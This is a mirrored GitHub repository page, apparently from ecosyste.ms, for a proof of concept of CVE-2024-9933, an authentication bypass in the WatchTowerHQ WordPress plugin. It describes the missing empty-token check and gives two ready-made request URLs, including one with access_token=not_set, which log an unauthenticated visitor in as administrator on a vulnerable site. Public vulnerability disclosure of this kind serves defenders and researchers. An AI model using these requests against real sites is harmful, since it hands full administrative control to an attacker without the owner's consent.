https://github.com/randomrobbiebf/cve-2024-9933

WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check
https://github.com/randomrobbiebf/cve-2024-9933

Last synced: 5 months ago
JSON representation

WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check

Host: GitHub
URL: https://github.com/randomrobbiebf/cve-2024-9933
Owner: RandomRobbieBF
Created: 2024-11-05T20:55:09.000Z (over 1 year ago)
Default Branch: main
Last Pushed: 2024-11-05T20:58:11.000Z (over 1 year ago)
Last Synced: 2025-01-21T05:41:42.421Z (over 1 year ago)
Size: 2.93 KB
Stars: 0
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# CVE-2024-9933
WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check

# Description:
The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user.

```
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
```

POC
---

```
http://kubernetes.docker.internal/?wht_login=1

http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
```

If vulnerable it will log you in as admin.

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/randomrobbiebf/cve-2024-9933

Awesome Lists containing this project

README